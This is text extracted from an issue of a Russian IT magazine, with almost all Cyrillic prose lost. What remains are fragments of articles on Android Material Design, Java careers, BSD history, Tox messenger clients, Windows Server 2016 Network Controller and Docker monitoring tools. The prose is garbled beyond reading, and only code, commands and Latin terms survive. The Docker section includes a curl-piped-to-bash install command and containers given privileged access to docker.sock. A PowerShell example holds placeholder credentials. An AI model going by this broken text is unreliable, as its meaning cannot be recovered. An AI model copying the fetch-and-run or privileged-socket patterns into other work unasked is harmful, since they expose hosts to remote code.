EditText (. 8), . (Hint) , . , (. . 8), . (
):

,
. :


(. 9):

. 9.
TextInputLayout

. 8. ?

WWW
GitHub,

. 10. Navigation Drawer

NESTED TOOLBAR
(CardView), Card Toolbar ( Nested Toolbar), , Toolbar. . 8 . .

NAVIGATION DRAWER
Navigation Drawer , (. 10).
: , , , .
, Navigation Drawer,

DrawerLayout , GUI (Toolbar, ), NavigationView. : headerLayout


menu. , , ( layout), , , ( menu).
(
Google, ). ,
colorPrimaryDark ( ?):

,
(),
checkableBehavior="single". , title="@string/nav_sub_
menu".
(, )
:

onOptionsItemSelected, :

NavigationView
onNavigationItemSelected, , -,
setChecked(true); -, Navigation Drawer; -,
, (Toast).

SWIPEREFRESHLAYOUT,
,
...
,
SwipeRefreshLayout. , ,
, , .
,
.

. 12. ?

MATERIAL DESIGN ANDROID


.

TABLAYOUT
(Tabs). CoordinatorLayout Toolbar :

TabLayout, ViewPager ,
(. 11).
. 11.

onCreate, , :

, Tab.
(TextView) , .

mFragmentList, , mFragmentTitleList,
TabLayout. , ,
TabFragment :

NewInstance ( ) (putString) (title). onCreateView .


Material Design, ,
GUI. Google, , , .
...
, ?
Droidcon 2015 , Material Design,
, , , -- SDK. Google
, ,
(. 13), , 8 dp, 10 dp. , , 8 dp?
? ? , , 16 dp?
: Action , ? ? ?
, , Material
Design , .

. 13. ?

, ,
, . , Google () . , ,
Material Design ,
(: ) Holo-
Material . , ...

gogaworm
gogaworm@tut.by


JAVA-!

Java-
IT. ,
,
.
, , Java-, .
Java- .
.
Java-, .
,
.

, , . ,
, , , -, unit-, -, ,
Jenkins . ,
, ,
, .


.
Core Java. Java
, Java Oracle, OCA OCP
Java SE 7 Programmer I & II Study Guide. , .
, YouTube.
Golovach Courses. Java Core, JDBC, JEE , ,
. , Java-,
IT Sphere Channel.

, Java Enterprise .
Enterprise Java , JSP. , . Head First Servlets
and JSP OReilly.
JSP-, , -, MVC J2EE.
,
.
Java Enterprise Tomcat. , , , . Tomcat .
-, ,
, SSL.
JBoss/WildFly - J2EE- . JBoss/WildFly , , .
- ? , , , NoSQL-, SQL. SQL .
Java, , , JOIN . SQL SQL
. w3schools.
JDBC. , ,
? , ORM JDBC,
. ,
ORM JDBC ,
.
ORM Hibernate. . , Hibernate
. Java Persistence with Hibernate
.
- ( ) Spring. Spring, , .
. , ,
Spring 4 , .
Spring , , , , , Spring , Hibernate.
Dependency Injection / Inversion Of Control,
, container, , ,
scopes, XML-, , , , , Spring MVC.

Dependency Injection /
Inversion Of Control, , container,
, , scopes, XML, , ,
, , Spring MVC

-,
REST SOAP. .
XML ( Enterprise), XPath JSON.
, -. HTML, CSS
JavaScript? , . HTML
w3schools, CSS , , . JavaScript. jQuery AngularJS.
(, .
. .).
, Java Java. , Topcoder Codeforces.
, . , , , , ,
:). . , , , .

,
. , . , .
, , - -, , IDEA ( ) . , Hibernet,
, , -,
, .
, .
. , ,
, , , ,
. , ,
, .
.
, , ,
. , , , , .
, .
, , .

, ,
, , ,
. ,
, .
: . ,
, ,
.
, ( ).
. , , , ,
, , , .
, , - ,
.
. , , . .
-
. , , ,
,
- .
. , , .
? ,
.
, ,
, . . .
, ,
/ .
, . .
open source . , , . ,
.
( ). ,
.
, , ,
. , 90%- .
- - , , , . , , , ,
. , .


.
. .
, , , ,
. , -.
, , .
.
, , .
, .
,
, ,
. , ,
, - , - ()
,
, , , .


, . , , .

. - ,
. , , .
.
- , ,
. , ,
, , - .
, , ,
. ,

. , , .
, .

IT-, !
- , , . lozovsky@glc.ru
. , , .
, , ,
.


, , ,
.
,
, , Java ,
. , Java-, Joker JPoint. , Spring,
, . , , / ,

. ? ! ,
, .

WWW



IT



UNIXOID

BSD
1.
 BERKELEY
SOFTWARE DISTRIBUTION


zobnin@gmail.com

Linux FreeBSD,
BSD-. , , . ,
BSD.
, BSD
,
.

BSD. BSD ,
. NetBSD
BSD, ,
( Linux, ).
OpenBSD, , , , , . , DragonFly
HAMMER.
, BSD
, . BSD -
, , , .
-,
, ,
Sun, ,
Alphabet Inc. (Google), vi, API TCP/IP-, , . ,
, .
: 1BSD, 2BSD
-, - Bell Labs
Space Travel.
, PDP-7 , - ,
. UNICS
( CS X)
. 1969 , 1971- Bell Labs
.

BSD, ,
1973 UNIX
( )

. , UNIX (
FUN FACT
), . , , , , , 1977
UNIX

BSD.
B,
,
1BSD ,
.
Berkeley

UNIX Software Tape: Pascal ( 1975 C++
D.
), ex, UNIX- ashell, Star
Trek . ,
man- .
, , ,
. , UNIX ,
, - .
, 30 1BSD , 35 50 (, , ).
1BSD . ,

BSD.
Open Source.

2BSD, 1979-. , 2BSD
FUN FACT
,
BSD-
vi
hjkl
csh - vi
( ). Berknet,
,
, , ,
,

ARPANET. ,

.
.

1BSD
1,2 3,4 .
ar ( , .a) ,
READ_ME (, !).
READ_ME troff (man-) , BSD
. This will require
about 10 000 blocks of storage... _.P_.a_.s_.c_.a_.l (
wow).
:
Berkeley UNIX Software Tape
Jan 16, 1978 TP 800BPI
To extract contents do:
tp xm ./setup; sh setup; tp xm

, ,
UNIX:
The contents of this tape are
distributed to UNIX licensees
only, subject to the software
agreement you have with Western
Electric and an agreement with
the University of California.

DEC
VT100

: 3BSD 4.1BSD
1978 VAX-11, BSD Software
Distribution .
: UNIX VMS UNIX VAX. ,
.
-
VAX-11

FUN FACT
BSD
VAX


/vmunix,

Virtual Memory Unix.

/boot
Linux,
,

. ,
vmlinux
vmlinuz, z
zip (, gzip),
.

, , .
3BSD, UNIX,
UNIX- , , 2BSD. 1979 ,
DARPA. -, (Computer Systems Research Group CSRG)
.
DARPA ,
4BSD ( 1980-), ( 1981-)
4.1BSD. - 5BSD, AT&T ( Bell Labs),
UNIX System V ( UNIX BSD ,
UNIX ,
BSD , ).
4BSD : sendmail delivermail (, FTP-),
csh ( <Ctrl + Z> fg jobs) curses . , ncurses (new curses),
, top, mc, mutt,
.
BSD VAX11, VMS. , -
VMS. , VMS. 4.1BSD.
, 2BSD,
2.9 , UNIX V7.

BSD, 17 2012 ( , 2012 PDP-11).
: 4.2BSD 4.3BSD
4.2 ( 1983-) BSD , .
TCP/IP API , . , TCP/IP , BBN (
4.1a), , Windows 95.
TCP/IP- BSD- ( ,
) .
4.2BSD FFS (Fast File
System), FFS, UFS1 UFS2
BSD-. UNIX FFS Bell Labs, Solaris.
ext2,
Linux- ext3/4, ,
UFS1. 4.4BSD , (soft updates,
) , , -,
FreeBSD.
4.2 BSD, ,
Sun Microsystems. -
. :
. , , ,
Pixar.
4.3BSD,
, ,
,
Power 6/32. ,
,
BSD
. BSD BSD
.
BSD UNIX,
AT&T, , . BSD Net/1. ,
, .
Net/2 ,
AT&T. .
, 4.4BSD LINUX
, Net/2
1991 . Open Source: ,
( BSD :
, , ). Net/2
386BSD, , , x86.
, BSD ,

(CSRG, DARPA, ).
BSDi (Berkeley Software Design, Inc.) BSD x86 (BSD/386, 386BSD,
). ,
UNIX: 995 20 000.
. AT&T, (, BSD, AT&T), BSD UNIX,
. : 1) BSD AT&T, 2) BSDi UNIX
( - 1-800-ITS-UNIX,
BSD/386). BSDi , ,
BSD Net/2
: AT&T BSD, .
, , BSD
, Linux
. , , : - 1993 BSD
AT&T . , BSD
Linux , BSD .
BSD . BSD Net/2 x86 ( 386BSD),
1993 : NetBSD FreeBSD,
NetBSD OpenBSD, FreeBSD DragonFly.
1994 4.4BSD Lite,
NetBSD FreeBSD.


4.4BSD Lite

BSD ,

Linux. , , BSD
Android, Microsoft OpenBSD, NetBSD
, Linux, - DragonFly BSD. , , , Linux.

UNIX BSD

UNIXOID

IM
TOX LINUX

,
temazorin@hotmail.com

Tox (
2013 ) ,
,
Skype VoIP-. , Skype 2011
.
Skype, Tox : , , , ,
.
.

, , - . , . , , Tox
. UDP. , .
(
), . . Tox
, , , BitTorrent Sync.

. , , ,
. .
ID . Linux
~/.config/tox. Tox INFO
GPLv3.

4chan.
IM
Tox
, ,
, - -.
.
. . ,

. Tox GitHub, . - SOCKS. , ,
Tor. NaCl ( salt, ),
(Daniel J. Bernstein) .
Tox . . , Briar, (Michael Rogers) , Invisible.im,
(Patrick Gray) Metasploit.
WhatsApp, Viber .
.
Signal iPhone Silent Circle
Android. Tox , . Tox
,
(David Lohle) Wired.
, .
Tox

WWW

Tox -

Tox

Tox
Linux. Tox Linux , . Tox Ubuntu 15.10 Mate.

TOX
2015 Tox Tox
Foundation, . , ( Stqism,
AlexStraunoff NikolaiToryzin), Tox Foundation, . , . ,
. ,
Tox Google Summer of Code 2014, - .
tox.chat.
, , . ,
. . .
14 2015 , , .
,
.

UTOX
, uTox, Tox,
. Linux - 0.5.0. ,
Ubuntu uTox : . uTox .
Ubuntu Debian.
/etc/apt/sources.list
Tox, uTox APT. , , $CODENAME release. Ubuntu ( 14.04), Debian:
$

$

$
$

echo "deb https://pkg.tox.chat/debian nightly $CODENAME" |


sudo tee /etc/apt/sources.list.d/tox.list
wget -qO - https://pkg.tox.chat/debian/pkg.gpg.key |
sudo apt-key add sudo apt-get install apt-transport-https
sudo apt-get update

uTox Gentoo Arch Linux.


uTox .
. uTox .
Tox, . TOX ID. 76- .
, .
TOX ID, , . -
:
42E9CA1A838AB6CA8E825A7C48B90BAFE1E22B
9FA467A7AD4BA2821F1344803BD71BCB00A535
ID.
uTox. TOX
ID, nickname@utox.org.
uTox
. uTox Skype,
. . , -
. -, uTox .
( ) . .
SIP. - , -. Skype . ,
Skype Tox . , . -
. (350 ) .
150 .
uTox .
, . ,
uTox, . , . . , uTox
. Skype.

uTox

: 7 ;
: 10 ;
: 6 ;
: 5 .
QTOX
Tox qTox. ++
Qt 5.
1.2. , uTox. ,
uTox, qTox.
qTox 1372 . - , (, ).
. Skype.
qTox . , Tox
Linux. uTox.
.
: qTox . ,
. , , , uTox,
. ,
.
.
! Tox ,
. , , , uTox, qTox. . , , .
qTox Tox. , KDE.

: 9 ;
: 10 ;
: 7 ;
c: 9 .
TOXIC
Tox . . Toxic
ncurses Linux FreeBSD. , ,
2013 , Tox.
Tox, qTox uTox. Toxic . BSD- . Toxic
( ). toxic,
toxic help. ./config/tox/toxic.conf. Toxic.

.
, SOCKS5 HTTP-, , , . , - . Toxic uTox qTox,
, .

Toxic

: 4 ;
: 6 ;
: 4 ;
c: 9 .
XWINTOX
XwinTox Tox,
Linux, BSD-, Solaris FreeBSD.
Linux . ++,
FLTK.
, XwinTox Tox. , -

Tox. Linux XwinTox
, uTox. . , 150 . Linux,
, . , FLTK.
, uTox, GTK+
Qt, FLTK. , Tox (, Linux , OS X Windows) uTox. .
, - . . Tox,
XwinTox. XwinTox , Solaris BSD-.
XwinTox
Linux

WARNING

Tox ~/.config/tox!

Tox!

: 9 ;
: 8 ;
: 7 ;
: 3 .

WINDOWS
Tox
Windows. Tox. .
Antox Tox Android. -.
, .
- . Antox
Google Play Beta, Google
,
F-Droid. , .
iOS. Antidote Tox iOS. , . .
. , , .
Tox .
Isotoxin Tox Windows, Rotkaermota. ++.
Isotoxin , . Tox,
. ( , : , Tox,
), (, , Tox ID), , , - , ,
, , ,
. , .
Isotoxin

Skype Microsoft, , , Tox.


Tox - . , . Tox ,
, . Tox Linux. ,
, . ,
Tox, .
. , , Tox , Linux. , , qTox. ,
.
, Tox - . Tox. .
, Tox. Tox
. , .

SYNACK


WINDOWS SERVER 2016

urban.prankster

martin@synack.ru

, ,
, ,
. ,
.
. Windows Server 2016
Network Controller, (Software Defined Networking).
NETWORK CONTROLLER
Network Controller Win 2016, Azure, , IP-, VLAN,
Hyper-V-.
Network Controller,
Hyper-V, , , , VPN-, RRAS, .
Border Gateway Protocol (BGP).
,
VM.
MS NVGRE (Network Virtualization using Generic Routing Encapsulation,
Win 2012), VXLAN (Virtual Extensible LAN VMware, Arista
Networks, Cisco...). , , , , Windows Server.
Network Controller API:
Southbound API. , .
, ;
Northbound API. REST-.
PowerShell, API
REST System Center 2016 Virtual Machine Manager (SCVMM 2016) System
Center 2016 Operations Manager (SCOM 2016).
.
, SNMP ,
, , .
Microsoft Message Analyzer, Microsoft Network Monitor,
, , , ,
, .
SNMP-, .
, . , ,
VM, . Data
Center Bridging, IEEE 802.1.
NETWORK CONTROLLER
Network Controller , .
Kerberos, . .
. Network Controller
, . Network Controller
, Win 8/8.1/10.
Network Controller , DNS DNS ,
Dynamic updates Secure only.
Primary Active Directory-integrated.
Security f Advanced ( f ). .
, , ,
Subject . DNS. /
. ,
, .
IIS.
Network Controller ( ) ,
PowerShell. :
PS> Install-WindowsFeature -Name NetworkController
IncludeManagementTools

Network
Controller, . , , PowerShell, SCVMM 2016 SCOM 2016, . , PowerShell.
NetworkController 45 .

PS> Get-Command -module NetworkController

, , , . , MS Network Controller
PowerShell , , . , .

NetworkController

() Network Controller, , . ,
NetworkController.
NETWORK CONTROLLER

New-NetworkControllerNodeObject, . , REST-
( Get-NetIPConfiguration, ), (FaultDomain).
, Azure,
NetworkController . .
NodeCertificate.
PS> $NodeObject = New-NetworkControllerNodeObject -Name "Node1"

-Server "example.org" -RestInterface "Ethernet0"

-FaultDomain "fd0:/rack1/host1"

NetworkController.
.
( Active Directory Kerberos, x509 None).
,
NetworkController, , SSL , , .
PS>


Install-NetworkControllerCluster -Node $NodeObject


-ClusterAuthentication "Kerberos"
-ManagementSecurityGroup Example\NCAdmins
-LogLocation "\\example.org\nc"

GetNetworkControllerCluster. . Install-NetworkController
,
. Get-ChildItem Get-Item. , .
PS> $Certificate = Get-Item Cert:\LocalMachine | Get-ChildItem |

where {$_.Subject -imatch "example.org" }
PS> Install-NetworkController -Node $NodeObject

-ClientAuthentication "Kerberos" -ServerCertificate $Certificate
-EnableAllLogs

. , , Get-NetworkController. SetNetworkController.
,
,
. . : ( ) SNMP
. URI, .
PS> $cred = New-Object Microsoft.Windows.NetworkController.
CredentialProperties
PS> $cred.type = "usernamepassword"
PS> $cred.username = "domain\admin"
PS> $cred.value = "passwd"

SNMP $cred.type
PS> $cred.type = "snmpCommunityString"

. :
PS> New-NetworkControllerCredential -ConnectionUri

"https://example.org" -Properties $red ResourceId "Cred1"

, SNMP Properties ResourceId.


:
PS> Get-NetworkControllerCredential -ConnectionUri

"https://example.org" -ResourceId Cred1

. , . .
PS> $config = New-Object Microsoft.Windows.Networkcontroller.

ConfigurationProperties
PS> $config.DiscoverHosts = "true"

1440 , , :
PS> $config.DiscoveryIntervalInMinutes = "10"

, :
PS> $config.DiscoveryScopes = "10.0.0.0/24,192.168.0.0/24"

, . , ,
.
PS> $credential = Get-NetworkControllerCredential

ConnectionUri https://example.org ResourceId red1
PS> $config.Credentials = $credential

IP- ,
:
PS> $config.DiscoverySeedDevices = "192.168.0.1"

:
PS> $config.HopLimit = "3"
PS> $config.ActiveDirectoryDomains = "example.org"

:
PS> Set-NetworkControllerTopologyConfiguration

ConnectionUri https://example.org Properties $config

:
PS> $topology = Get-NetworkControllerDiscoveredTopology

-ConnectionUri https://example.org
PS> $topology.Properties

:
PS> $discovery = New-Object Microsoft.Windows.NetworkController.
NetworkDiscoveryActionProperties
PS> $discovery.Action = "start"
PS> Invoke-NetworkControllerTopologyDiscovery

ConnectionUri https://example.org Properties $disovery

, . , , , , . Windows
DCB, :
PS> Install-WindowsFeature Data-Center-Bridging

, Microsoft LLDP Protocol Driver QoS Packet Scheduler.


:
PS> Enable-NetAdapterQoS "Ethernet0"

DCB Get-NetQoSDCBxSetting.

Get-NetworkControllerTopologyDiscoveryStatistics:
PS> Get-NetworkControllerTopologyDiscoveryStatistics

-ConnectionUri https://example.org

, :
PS> $topology = Get-NetworkControllerDiscoveredTopology

-ConnectionUri https://example.org

.
PS> $topology.Properties

:
PS> $topology.Properties.TopologyNodes[0].Properties

:
PS> $topology.Properties.TopologyLinks[0].Properties

, : Get-NetworkControllerDiscoveredTopologyLink, Get-NetworkControllerDiscover
edTopologyNode Get-NetworkControllerDiscoveredTopologyTerminationPoint.
,
, , . . ,
. NetworkControllerDiscoveredTopology
New- Remove-.
IP- New-NetworkController
LogicalNetwork, New-NetworkControllerLogicalSubnet New-NetworkControllerIpPool.

.
, . PowerShell
, , .

SYNACK


DOCKER

urban.prankster

martin@synack.ru

, Docker
IT-,
. , , , .
, ,
.

- : - .
: . Docker -
, , , .
, ,
. .
Docker , CPU, Mem, I/O .
: sysfs (
/sys/fs/cgroup), stat API.
$ cat /sys/fs/cgroup/cpuacct/docker/CONTAINER_ID/cpuacct.stat
$ docker stats CONTAINER_ID

API , .
$ echo -e "GET /containers/[CONTAINER_ID]/stats HTTP/1.0\r\n" |

nc -U /var/run/docker.sock

, stdout/stderr Docker .
Ubuntu /var/lib/docker.log.


, ,
. . API .
, cAdvisor, , , . cAdvisor,
. . ,
, . .

. , , . cAdvisor InfluxDB
Google BigQuery. InfluxDB -storage_driver=influxdb.
cAdvisor Docker,
( Docker).
$ docker run --volume=/:/rootfs:ro --volume=/var/run:/var/run:rw
--volume=/sys:/sys:ro
--volume=/var/lib/docker/:/var/lib/docker:ro

--publish=8080:8080 --detach=true

--name=cadvisor google/cadvisor

, , http://localhost:8080. , cAdvisor Docker.


Docker.
Axibase Time-Series Database , , cAdvisor ( ),
, . ATSD Docker cAdvisor.
TCP, , --atsd_storage_url
--atsd_storage_write_host. ATSD
collectd, tcollector Nmon, .
.
open source
Prometheus, . Docker .
Zabbix, , .

cAdvisor

, . Docker, ,
: , .
STDOUT,
docker logs -f <_>.
, STDOUT .
. , ,
-t STDOUT TTY.
. --log-driver
docker run, syslog, journald,
fluentd, JSON .
$ docker run ubuntu --log-driver=syslog

--log-opt syslog-address=udp://192.168.0.1:514

--log-opt labels=ubuntu

, syslog, . , .
. , {{.Name}} , {{.ID}} .
, -v /var/
log/:/var/log/, . .
, .
logspout (STDOUT, STDERR syslog)
.
$ docker run name="logspout"

--volume=/var/run/docker.sock:/tmp/docker.sock

gliderlabs/logspout syslog://example.org:514

. , httpstream . , ,
-e 'LOGSPOUT=ignore'.
Logjam UDP- . Docker
logstash , ,
, .

, .
GUI Docker Kitematic, OS X 10.9+ Windows 7+ 64-bit, , Docker,
( VirtualBox). .
,
. Docker Remote
API, ,
. Shipyard, ,
Docker. , , , , (, , , ,
), . CPU, , .
, IP.
docker exec. , OpenLDAP Active Directory. , .
, . RethinkDB. Docker Swarm, Docker-
. :
$ curl -sSL https://shipyard-project.com/deploy | ACTION=deploy bash -s

,
Swarm, . 8080 , / admin/shipyard. (
LDAP, RethinkDB, )

$ docker run shipyard/shipyard server -h

Shipyard

, Dockerding, , (ID, , , , , ), ,
, , , , .
, . . ,
, .
$ docker pull evolutio/dockerding
$ docker run -d -p 3000:3000 --privileged --name dockerding

-v /var/run/docker.sock:/var/run/docker.sock evolutio/dockerding

http://localhost:3000 .

Dockerding


,
. Docker
Docker Registry,
.
Docker Registry UI - Docker Registry, , ,
, .
. H2, H2.
. Docker Registry.
$ sudo docker run -p 5000:5000 registry

, URL ( localhost ),

-.
$ sudo docker run -p 8080:8080 -e REG1=http://example.org:5000/v1/
atcol/docker-registry-ui

http://example.org:8080.
Registeres, Ping succeeded. Images ,
. -e READ_ONLY=true
.

Docker Registry UI

, , Portus, . (teams).
, (namespaces), . namespaces
, .
namespaces : Viewers ( ), Contributors ( ) Owners ( ). . , ( ),
. LDAP.

. , .
Git Dockerfile . Captain . .
.
Zodiac , Docker Compose, .
. docker-compose.yml
zodiac deploy. docker-compose.yml . zodiac list . , zodiac rollback
_.
Rocker-compose , Docker
Compose, ,
. , . , . (Docker Compose
). , ,
. ( ENV).
BASEIMAGE-DOCKER
Docker ,
. Docker Docker Hub, , . ,
, , .
. , Baseimage-docker, phusion/baseimage. PID 1, - , Linux . Docker
Linux init- ,
Linux. Docker , CMD.
-,
SIGTERM , . (, ) , , , -
. Baseimage-docker
/sbin/my_init, .
. Docker , .
, .
. ,
,
. syslog, crond , UNIX- , . SSH, docker exec Docker 1.4
. Baseimage-docker runit, .
setuser .

Baseimage-docker

, Docker. , , , , Docker-,
.

FAQ

Zemond

3em0nd@gmail.com

FAQ

( ? FAQ@GLC.RU)


WINDOWS
, ,
, . , Windows. , ,
.
, Performance Monitor, . , , , ,
, ( Server 2012),
Administrative tools. , ,
perfmon.msc.
- . , , - , .
, . :
Memory f Pages/sec
Processor [_Total] f %Processor Time
System f Processor Queue Length
Physical Disk f Avg. Disk Queue Length
Network Interface f Bytes Total / sec
. .
Performance Monitor.
, . , ,
, . , .
, , ,
:
Memory

Pages/sec

: 0.
:
20

Processor[_Total]

% Processor
Time

70%

System

Processor
Queue Length

2*

Physical Disk

Avg. Disk
Queue Length

2* ,

Network Interface

Bytes Total /
sec

65%

, , .



-, ,
, .
, , ,
.
. HP,
ScanToPdf .
, , . ?
, , .
, . ! , ,
ScanToPdf , . ,
Sysinternals. Process Explorer ,
. ScanToPdf, DLL, twain.log. :
C:\Users\%username%\AppData\Local\Temp\twain.log

, , .
. .
twain.log , . , .


.NET FRAMEWORK
NET Framework 3.5 0x80070643, .
.
1. MSI.
2. .NET Framework.
3. .NET Framework.

. Fix it, Microsoft.


(
).
. wuapp . .
, . .
, .
. , , . .


WINDOWS XP RDP
Windows XP RDP :
, .
.

RDP

:
1. , Windows XP service pack 3.

2. RDP .
3. .
, , , , . .
, . , Windows Server 2008 Server Authentication.
, .
.
regedit . .
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]

Security Packages tspkg.

tspkg Security Packages

.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders]

SecurityProviders credssp.dll.

credssp.dll SecurityProviders

18+

2 (205)


rusanen@glc.ru



glazkov@glc.ru


-
pismenny@glc.ru



PC ZONE, , UNITS
pismenny@glc.ru

ant

zhukov@glc.ru

goltsev@glc.ru


X-MOBILE
zobnin@glc.ru

rusanen@glc.ru


UNIXOID SYN/ACK
kruglov@glc.ru

Dr.

MALWARE, ,
PHREAKING
lozovsky@glc.ru

MEGANEWS

nefedova.maria@gameland.ru


PR-
yakovleva.a@glc.ru



samsonenko@glc.ru


shop.glc.ru, info@glc.ru

(lapina@glc.ru)
: , 109147, / 50

: claim@glc.ru. : 115280, , . , .19, . : : 606400, ., -, . , ., .13. : , 614111,


, . , . , . 26. , (), 77-56756 29.01.2014 . . . , ,
. . : xakep@glc.ru. , , 2015